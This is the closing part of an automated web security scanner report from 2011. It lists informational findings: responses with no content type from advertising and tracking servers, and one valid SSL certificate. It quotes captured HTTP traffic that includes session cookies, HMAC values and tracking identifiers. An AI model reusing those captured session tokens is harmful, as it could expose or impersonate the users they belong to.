Cookie: ServerID=1045; PHPSESSID=29jkomkf8kicpicajt2rkq4nq6; ignite_loggedin=false; browsertype=web; s_cc=true; __utmz=112756251.1304949643.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); rsi_segs=; ipc_nme_core=1304949672; __utma=112756251.356327229.1304949643.1304949643.1304949643.1; __utmb=112756251.2.10.1304949643; __utmc=112756251; __utmv=112756251.|1=Core=Y=1,; ipc_nme_last_visit=9; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Apr 2011 13:51:13 GMT
ETag: "1c20313-e36-4a131af475640"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain
Cache-Control: max-age=829177
Expires: Thu, 19 May 2011 04:26:40 GMT
Date: Mon, 09 May 2011 14:07:03 GMT
Connection: close

..............h...&... ..............(....... ...........@.............................................................................................................................................
...[SNIP]...
26. Content type is not specified  previous  next
There are 3 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

26.1. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?ad_type=iframe&ad_size=468x60&section=1384085 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!?!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%/!!!?H!!!!%<wR0_!!*oY!!!!'<ypn'!!-?2!!!!-<ypn'!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!(<ypn'!!0O4!!!!)<y]81!!0O<!!!!/<y]81!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!/<y]81!!J<E!!!!/<y]81!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!(<ypn'!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!%<ypn'!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!0<y]81!!q:E!!!!-<y]81!!q<+!!!!.<y]81!!q</!!!!.<y]81!!q<3!!!!.<y]81!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!(<ypn'!!ucq!!!!/<y]81!!vRm!!!!)<y]81!!vRq!!!!)<y]81!!vRr!!!!)<y]81!!vRw!!!!/<y]81!!vRx!!!!)<y]81!!vRy!!!!)<y]81!!w3l!!!!(<ypn'!!wQ3!!!!(<ypn'!!wQ5!!!!(<ypn'!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!)<y]81!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!%<ypn'!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!)<y]8:!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!)<y]81!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!)<y]81!#7.'!!!!)<y]81!#7.:!!!!)<y]81!#7.O!!!!)<y]81!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!)<y]81!#MTF!!!!)<y]81!#MTH!!!!)<y]81!#MTI!!!!)<y]81!#MTJ!!!!)<y]81!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O29!!!!%<ypn'!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!/<y]81!#SF3!!!!/<y]81!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!)<y]81!#UDP!!!!/<y]81!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#Z8A!!!!%<ypn'!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]@s!!!!%<whqH!#]Z!!!!!%<ypn'!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`-7!!!!%<ypn'!#`S2!!!!(<ypn'!#`U0!!!!'<ypn'!#`U9!!!!%<ypn'!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!'<ypn'!#a=7!!!!'<ypn'!#a=9!!!!'<ypn'!#a=P!!!!'<ypn'!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!)<y]81!#ai7!!!!)<y]81!#ai?!!!!)<y]81!#b:Z!!!!#<x2wq!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!%<ypn'!#c8W!!!!%<ypn'!#c8X!!!!%<ypn'!#c8]!!!!%<ypn'!#c?c!!!!)<y]81!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#eLS!!!!#<yjEE!#ePa!!!!#<xr]M!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!%<ypn'!#fG+!!!!'<ypn'!#g=!!!!!%<ypn'!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#h.N!!!!#<yMiw!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ne_!!!!%<ypn'!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!)<y]81!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!)<y]81!#tM)!!!!)<y]81!#tn2!!!!)<y]81!#uE=!!!!#<x9#K!#uJY!!!!/<y]81!#uR3!!!!%<ypn'!#ujQ!!!!%<ypn'!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!)<y]81!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!,<y]81!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!8/!!!!#<xl.y!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!$<ypn'!$#R7!!!!)<y]81!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!)<y]81!$(!P!!!!(<ypn'!$(+N!!!!#<wGkB!$(Gt!!!!,<y]81!$(S9!!!!%<ypn'!$(Tb!!!!#<yQLc!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!(<ypn'!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!%<ypn'"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 14:00:04 GMT
Pragma: no-cache
Content-Length: 4552
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
26.2. http://pcm1.map.pulsemgr.com/uds/pc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pcm1.map.pulsemgr.com
Path:   /uds/pc

Request

GET /uds/pc?ptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9 HTTP/1.1
Host: pcm1.map.pulsemgr.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 43
Date: Mon, 09 May 2011 14:00:03 GMT

GIF89a.............!.......,...........D..;
26.3. http://www.meebo.com/cmd/tc  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/tc

Request

POST /cmd/tc HTTP/1.1
Host: www.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
Cache-Control: max-age=0
Origin: http://www.meebo.com
If-Modified-Since: Wed Dec 31 1969 18:00:00 GMT-0600 (Central Standard Time)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=7c2126d393b99323557e; tcookie=299d841e219be7e7276c%26true%26ic22%3D1%26ic19%3D1%26ic17%3D1%26ic16%3D1%26ic12%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ac12%3D1%26ac10%3D1%26pc1%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic3%3D1%26ic1%3D1%26ac8%3D1%26ic5%3D1; meebo-cim-session=2700844b1a232e5d2007
Content-Length: 59

tcookie=299d841e219be7e7276c&partner=gannett%3Afloridatoday

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 14:00:45 GMT
Connection: keep-alive
Content-Length: 107

{"stat": "ok", "data": {"tcookie": "299d841e219be7e7276c", "canopy": {"enabled": false}, "categories": {}}}
27. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ccnow.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ccnow.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 02 16:46:17 CDT 2008
Valid to:  Wed Aug 01 16:46:17 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
Report generated by XSS.CX at Mon May 09 09:36:16 CDT 2011.